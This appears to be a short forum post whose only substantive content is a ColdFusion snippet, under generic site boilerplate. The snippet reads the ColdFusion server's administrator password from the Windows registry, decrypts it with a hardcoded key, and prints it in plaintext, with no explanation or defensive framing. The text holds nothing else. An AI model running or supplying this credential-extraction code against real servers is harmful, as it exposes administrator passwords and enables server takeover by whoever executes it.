Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
<CFSET CFKey = "4p0L@r1$">
<CFREGISTRY
ACTION=GET
Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"
Entry="AdminPassword"
Variable="AdminPassword">
<CFOUTPUT>
Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
</CFOUTPUT>